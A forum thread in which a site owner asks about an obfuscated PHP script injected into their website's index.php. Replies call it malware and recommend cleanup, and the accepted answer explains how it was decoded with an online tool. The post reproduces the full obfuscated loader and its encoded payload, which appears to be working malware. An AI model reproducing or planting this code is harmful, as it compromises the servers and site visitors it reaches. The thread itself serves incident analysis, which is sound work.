# i have found a suspicious php script on my website index page can someone explain this to me

Tags: server, hosting

Can Some one explain to me how was the script injected to my hosting account index.php file ?

```
$eGOuHaCwPcvx='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$eGOuHaCwPcvx[(105/15)].$eGOuHaCwPcvx[(26-1)].$eGOuHaCwPcvx[(1*49)].$eGOuHaCwPcvx[((10*1)+18)].$eGOuHaCwPcvx[(14+22)].$eGOuHaCwPcvx[(44+5)].$eGOuHaCwPcvx[(44-13)].$eGOuHaCwPcvx[(684/18)].$eGOuHaCwPcvx[(23+4)].$eGOuHaCwPcvx[(72-(33-7))].$eGOuHaCwPcvx[(154/22)].$eGOuHaCwPcvx[(11+25)].$eGOuHaCwPcvx[(65-(62-31))].$eGOuHaCwPcvx[(26-6)].$eGOuHaCwPcvx[((27*2)-8)];
    
    $pHFdNhg9688=$eGOuHaCwPcvx[(20-9)].$eGOuHaCwPcvx[(2*4)].$eGOuHaCwPcvx[(29*1)].$eGOuHaCwPcvx[(160/4)];
    
    $MYtraky2482=$eGOuHaCwPcvx[(8*5)].$eGOuHaCwPcvx[((1+0)+2)].$eGOuHaCwPcvx[(6+(1*(95/19)))].$eGOuHaCwPcvx[(140/5)].$eGOuHaCwPcvx[(522/18)].$eGOuHaCwPcvx[(7*((7-3)-2))].$eGOuHaCwPcvx[(2*14)].$eGOuHaCwPcvx[(138/(2+4))].$eGOuHaCwPcvx[(1029/(378/18))].$eGOuHaCwPcvx[((2*189)/9)].$eGOuHaCwPcvx[(12+(0+0))].$eGOuHaCwPcvx[(31*1)].$eGOuHaCwPcvx[(48/(36/12))].$eGOuHaCwPcvx[(735/15)].$eGOuHaCwPcvx[(0+7)].$eGOuHaCwPcvx[(18+2)].$eGOuHaCwPcvx[(18-(10/5))].$eGOuHaCwPcvx[(735/15)].$eGOuHaCwPcvx[(0+(2-(1*1)))].$eGOuHaCwPcvx[(16-(3+(36/(0+18))))].$eGOuHaCwPcvx[((167-23)/18)].$eGOuHaCwPcvx[(0+(18-9))].$eGOuHaCwPcvx[(1*3)].$eGOuHaCwPcvx[(11*(1+(0/(78/13))))].$eGOuHaCwPcvx[(2*7)].$eGOuHaCwPcvx[(29*(0+1))].$eGOuHaCwPcvx[(38-(8+9))].$eGOuHaCwPcvx[(15*2)].$eGOuHaCwPcvx[(45-11)].$eGOuHaCwPcvx[(1*46)].$eGOuHaCwPcvx[(1*(17+21))].$eGOuHaCwPcvx[(78/3)].$eGOuHaCwPcvx[(21+(77/11))].$eGOuHaCwPcvx[(22+14)].$eGOuHaCwPcvx[(343/(91/13))].$eGOuHaCwPcvx[(1*1)].$eGOuHaCwPcvx[(21-10)].$eGOuHaCwPcvx[(22+(12/2))].$eGOuHaCwPcvx[(180/20)].$eGOuHaCwPcvx[(3+((0+0)*1))].$eGOuHaCwPcvx[(686/(126/9))].$eGOuHaCwPcvx[(61-(32-8))].$eGOuHaCwPcvx[(476/17)].$eGOuHaCwPcvx[((4-0)+22)].$eGOuHaCwPcvx[(((23-(2*5))/13)-0)].$eGOuHaCwPcvx[(7+(84/21))].$eGOuHaCwPcvx[(28/2)].$eGOuHaCwPcvx[(9-0)].$eGOuHaCwPcvx[(3*1)];
    $UrR1094= "'7Rxpd9s28rP9K2g+v1Da0pScu7blxEmUY19ieyVld/PaLB9NQhLXFKElKctK6/++M7gIXrKcpK/dQ6+xcMyFwWAwA0AlSUITNyFzmmRhPGl124fbz1OSuVk4I24UzsKs9eBxlzWHk5gmxF2kJHG9C0Bo7UPz7vUsir0ZMXqGNfPmaepAgwXtQQZNXSikYUagxx2HEYMSdYSBr3gxg8b73S6AhuNWmAL31q77pj/6yQoy63O7/cv2FiemtR5u33DC0PxctKczbMC+3X8GYYKskMc0y+buklxgHcuW4ONiJW0hfYMBSYAUIG5IlJJyh8W5zhZJ6GYzbE5nCfnXgqSZC20t1Ab2pX4SzlFg02S80iyB/1o5pm2Yznw6N9vGvXvGDhsHGyV2ewlKTq7nEQ1Ii8PZRo4LTLaKXCTaT93PDoN/ZiKMLqcC2f9c7gLJcP4jzwduz4CV2Snzu8FB5C29nmWh0uCjNVodoR7U1oXlWF5KHsPXQ5fA39iH0eBsMASUKG0VeIwXsZ+FNC6rlPMJx4ayjGF/8Nf+4Cdr0P/Lx/5w5H4cvONWYohPzqMe9pBByhkWH830JJKXTK6KlBuon789h/L719ZnwzGsZxb8LVOBuTlUZEqsv4YqDGfwyR2OBu9O31g66e38b0KyRRIL0jg3z3c9rmO1lDzf+vxMKx8Ii5WAO2jDaKQKExqWCdiriQbLSmj2W8SfUtFjBDQmO2iC5Bq8B7Of3QkVKzAl9OL+wwdORudT4gUOjaMwZpYx99J0SZMAoGbBoxb+kyt7HuA8oGRGS4MDco/GF+MHj8ePL/a7T7oe8R8/Gne7/sVT8uCR/6PvP7TahrBULwhcn8YZiTPNZ6ADAuclVZgr6LnSCjao/oDOvFDv5w2yH1XHW3R7nNKUrVPeU2t+CkbN8NvR6Nx9ezYcKYNlfzudDUBBR9kUQMAL4uharvv63fu+64IKeT+6YlcAMWDH6iT0gmapk11nlhrMjlCIPhqlImu+kKA3avS5nbDudmGFSUeozYVtsf2ivMoAmMkIJpRm4CqUwGVAPite5jFvTBdZQHXowwJwzcLT8a2PsLXteRMQ68D40/ZJFNHlgdGxSkTKgspRIRUb3KCjj69OXrZYrKOL5FhshYYXJbAYVgYgkmAHe8pM6yWvbGQ1HyaXG5MljDBLwhkXtO2YPyc/x6ZjDbkMBwYjc9DBAaCJOeWhHFbIN0h1Z653Y1pp6XTK1JbLpTNZBF48ScnUyxyfzjrQH8YBuUZ7q1MkN5pFJjnrVmer4bSlQyl/8kmllzUTeIu6cmwWJXFHOvYAvs4aqmrIazVMqvbGArZa8jfN6zkgUWk9b7ZEN1qedXuiXJYV8QT7Oy2825bKb7RM1rmc7748Kq7pG2z6FntuGNfd7PiOVhtQkhoxzQxmck2Wy74w9MDAQ4WV+dwbeUhp7JDZPFu1ilvpEIINjHnAtjIKWwBJ6gB2cEnQ8djSlSdCrixZELExGjgwxqscXrJd++/u67PB304Gr/qv3PPB2ehM8L4dDJakyleMTWWoHa/7enB2OnL7p6/cjYZfB7+hNvS4lFkFCw5hdueFPA4bWB4XBoX2MGCtc9iiC+3YwHpERqjnNLBibMuyeZKF6eDa6GnXj6h/KZwOl4wHrpKZaGGweW8dQ9GLMRc6UlmViROXVDZj7qbK+1r5vgzphJLSxQXzeaLffsDj6wi2On1UJhvVycuX/fOR+/7k9M3Hkzd9E4WWkOAKsIgqoWlVIR+h5gLOKVcLBwEcmrYLeXoBadB/3R/0B3nSBHlnlE5LspVgD6uQwEdW23kuXoKyWL6JskwI+LarFmR5H85Gfffk1auBJU3YhzTUn83rYWzDWsSXMV3GlvKBygJqMYClWE01+WgOV17Ehb6SZA1Qa2VrwGEK4Qceuh1rKmKqf/n+Hcyr++68UUtlsFphCnyaMDWFFUB0jwal9ZJUgO8oTwVfWg4wDNlyYmg2LFxluaxFnJGo0xjbtHmHiFzyCVHgLNPn1HeEiegHYG3j11/BmehNhfOUxrOyG50iPzcTtHhlDRV+uAYyIYl5QibuzMv8KXiqf1gQcXRMp4DhWK2fgx/azzBQ3u2E6DvVwRUeJHlJIrX0HHN42CDMlzy+2MtWc3JgZOQ66wC22VaZpBCco4OHKxzYMDdf8KEu96E5eH3WzBD3cXT59rIbXmGoH/DTR2yRg4Pws/XFFbUWP5OwgYbNNgWIh+CfQLaFVm11fNiWUPnZmxAqP+ZQ0cZtXKAHNcUKboFNj5802ixOQ5hel0Ol8yjMUgTuyd2FFTCIOyVLbfb5lqQoOhaPH5kgEEAKyYIsZmeFgE960B0GjnWPU+W7D1SZPDLyvAcTirUAy2IAWBdFaFQiQ6ssc9iC9E5pPAJE6+ONamSOHOShHj+wsFnlFDhDxTnQZx33jZr5+yW3zprMoHIoXGeBpfNhzQxRsS4YNfQaWG6Zn/Zme8HPo7cH4UF6btp4xN5qS08ixeUrCkkePQONG1ckSWE4PXPf6ZoGwYPUMJ70zI+j13tPzWfH20e4J5JMiISn8WnP1PJgQTh1aDLppP4UKqk0gk7X+dHUMQ+u07CAvXzA8MCF7Hf+/uH9kOHvhXGaebFPFG4KQ2Jd76nvZUzeO4hQiPvvgCfLznUamDIXKGvSAVVCB6rpmAEcgas+RrMGRnxx4NEqiwsdPP3G49ajDgIJcC/NZjQ4ZmBqVjmQ6OKAPkYmZJyQfx0HXhitjjpaCweZJyGFnGh13HX2jzqqhvJ1UEArj4bKNwEsM0TzjaTJsGXEDKw0Zt4/pgnxwM0rYl5q7F550YLoRi6JfIWaODHD+b21dbO9hRG2dinCzq3xhHpLU5K+wXCfhlcdvKQh20oneLDNFzPLRWWzY24z9rDojk22ryqfM+F7XNT+xdje2pVJN6YPLO2Gbi0T5zO5hYnZjoLFaAak9vFk1seJC2O+u2xtsSowpXNg4k9t4+XHwfuzc7zVeG8bklwz2KA/+jg4HQ1OTocQetv7DFoXkmGSa+IjXk4LQpuUyKYbGJi8WJCoBbcr7gTwOosV93kw1pL+YEqiiDpIgATzhDrXqy8dDohHzya73mL1+5si3s8RUwRy5zCj43QD9Nlsv4wbUS/YCFPjOs20m4XqRJvONPN8n6QpB2enkOsx+EEluyJEDBSKJC7U8VJxOQf/60eLgKQd3KgjWGR7HIShSIw6eGxXQGPg55IgzGgt7WEItMl5SDoIuMcBJTIPRt0ghODPx5Gx1Ta7VA220X3y6JHNsn++kLaqp1EImcuE145qEvjSaEketYIJrjV0AdwLZmHcCWfeBFDA/dHlXkTGWerM4wmyKkwDs/aN6SThZJoTyqd/DRUlvCCUzsIoxCpAuQG5CiNnEo7vItdain6ygh1a0SyJKA1qnQ1qRpfj3I6h4J/7U/D1OhluEe1DvUdvrx1pAV94FKck/zpUgagL7wj/0izm44cPa8Vk7fW8SmtJmTL3RXwBlHLOPKuyHFgHeep5SwCvnMMz8M4YHePmD/FyGDTF8UGmAvdiSP/lC1TAcNILCpsMNODDCezHb6iyrBbrrAANIDHjiKJDFU+QsI7fUKUpVmjKAPlBDTbIMjTnOXpPhBa8dihT+Fmk2VhtiC9C9h15+q/j2FaMt5j4RIVd4xXuFbUbgyIOvcQ62LJoqdxGrktzYeYODYhcEthye4tsDEF56daxPKrCi4syb5PlvTpGiRoPRXSAUr/IRmWdJSzNY885P+p22Tlq0+DZUUpn39k3ANJ4BzhJ7EXGkCSQohh9fEhklWX9Wlkedh9uKAtAGqc0M17TRRzcyl+Ei0oO+fRGmIc4lYVImN1J57zXGQCOYY0FYNTIXyNpbw6gQX+1IXPoIhC2FKBkTq2ByaYyNS29LhLVOio4VeAylMjD9fcPvEWHQkXyMVav4GTMIAFqLuKe8yBCQNjdJ0+e2CKIKIPyKyJ6afBzA+azjHTBYq073KKr6J4TkJfxtbdMuRkVSzA2TXHMRVufyxehOFsQQXgrUGAExF9pmjgsq8oHi85aOU77uHe/7t5SshNZjlVzV1yB2fRoQaSVDLfmaGFC6SQi7Ha9mp0/fWjW3VurrDRXRl1eWlKG2jQZXMOjkeYhy+RWSFdIcOWATKf2TgiTxNy6cB9mImhJ75EcdN1wi1bS3FIjr6LL2uuIa28vq8bnWOIlZpXVShwMj+mcxC1JxYbwv7x34WfMUzqBZhdFrYMXCSOHb1q2Jr9W3kT5Qr4qoU6Hk0JCAAcBQg0zdhNcUP66q2tcF0w7EfgQA/zfBWxuagmMPejaqdFpDZcaJ7Hh0ex/3LlsNTDEEcoIr7Az6PeXdtd+2u71LBYpl3Zcpq7cvAtoT9sV275Zw+MJ8ph6/mUNizL0k9qnIQ1yPKnK0TTzxe2Bbf9VSfIz/97+ejFkEfhPvtRtciVydRsHPg8RhzbyDY81+YIewWp85LShCIUx4bkCp9squFHldazlj+tdOa7JNclAA2e1ZQA65gWGDxtPhmt5LTf8iKcnmNNBtL6KSM/0aUSTg4QE5rFOaueIHY40eX5FsOIe9E91N1BD17RnrFNfM/HJF/4IB2fCZrpcCyx893i+Bkr336Y4IDbvsoM2OvQih3VuXUGWQnz9s+a93R0H22gL3BDkAyW2PUA6YpyTBJJqDK5SaSHaZmf90fRUjU9ufanYoA9hqrBEuEvRR1+4S/guKvid9tP6ze3u89I0J01PO/GDXnuNL8UIrmHr2NSFfp3r/G4us95V1gXMpSi2UR8bRLT1XvFOgez3dYSbxbVl42lYtpuN44/m475SBcXDpkqMVZfy/I8umD/yIvkvXBgbb3+/3YrYzv9iaB4G3+mI83e8sLjthmLNPURPzcg9PGzGKn5r49r0OkIo9O5XEgLxK68l6mT8tssFZWVrLhga7exbLxp0K/yKy4Zvlqvp0qFerrUXD42yVNai/rj5v3AZbbSE1rzeWWPd65/wlIx8S3m9uy/Sb/CMX7+2/39p+N3W77deGm7K/0F3f0P+AGl8oFckYLGCFwNytCrLsdYCKlxvNQEphHygeWCwddtsMpW7U+mxtvUf6wsXon5lPVHCNvx4SP9hibrNN1oCky997fRxl98xvaBIlV0Xtcw3rAn4mrb5yZtSumMMo0Uyl1VV44DGSTAkcYoq4sQs27BWCKirXNxLGS2No7iYKp+G7qr3hGqMCFW+wTPQYuY0FWOzGV7t0Wrlh1K50oulUhxb/CWVnB5tdmg2JclvPEHpPATDGvLfM/ELvZY5IrEP4KPEuyIRSWAuZmnMZ2xIU8pxfmC1CV0YuPPxNmgKPddL/Gl4xWqf6CLw6AuG+mF4ygt/9q48o3U2BrsFPG9mAOk2tL/wwleLoST0VxpGHjMKdnnD2b9Q3dky9IVwXArVM5wTEqzy+lsCqVASXkPxfJVNabwHe2AUXkD9JCLXIMq7E+NEyIxynKSX8Ld/7XGeLxdpRuH7DDYIeg1D6HyialArz18hzwW4xBVvisgkxa/lfA/YXoVeBLXTReZPETDz/MuBN7vgoo+mhKlPqKwiCniYyMgoRRIf/rx/n0t0Cv4j8cZcqe/6LxNvycn97Q3JGDgTwEsuwhgKr8N0aqQEeZiweKBxAnRwHV14YbDAgkcjS3ThN9f5Cw50Mk3IOMVK7YLTLOg/f8XxyIa9AeYrjj0W2+gpsBzEThGnsNqqD4Nl10bPg28FrnkkrHiXR1J+L1wgrr8aztUpnw4XSBXeD6t3Efn7EflUQO0A+s+K+HOS0lsS5rACVBUeddRB4Gc5xYy9xS/KABaffXDYaZv/pJXNc/3dWfHH73icxZJ3dpDAf/2HxZ2e6ZiFmmM2/X8axCh/+oxJAFbudjLMFC7FPyybcUX7wAn1/m8='";
    
    $JTx2343=$pHFdNhg9688;
    $JTx2343.=$UrR1094;
    $JTx2343.=$MYtraky2482;
    @$mEriqO3481=$q2866((''), ($JTx2343));
    @$mEriqO3481();
```

Comment: There are all kinds of possibilities. https://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server

Comment: can someone explain that format of the code, means how to decrypt & understand what the code does?

Comment: It's obviously obfuscated and while it may  be possible to use a tool to de-obfuscate it, it might take some time to find the right approach. But you don't really need to understand it in any detail. If it's not supposed to be there, then it's almost certainly malicious in some way, and you need to get rid of it and ensure you fix whatever vulnerability allowed it to get onto your server. That should be your first priority. You can worry about the precise nature of the code afterwards, if you're curious.

Comment: https://security.stackexchange.com

Answer (score 3, accepted):

I used
http://www.unphp.net/

Posted in your code and pressed decode. Bingo!

Pasted the output into my php editor to read it through more easily.

Out of curioisity, I also copied some of the urls in the code that go to malicicous txt files to see what was being called.

Looks like a wp hack.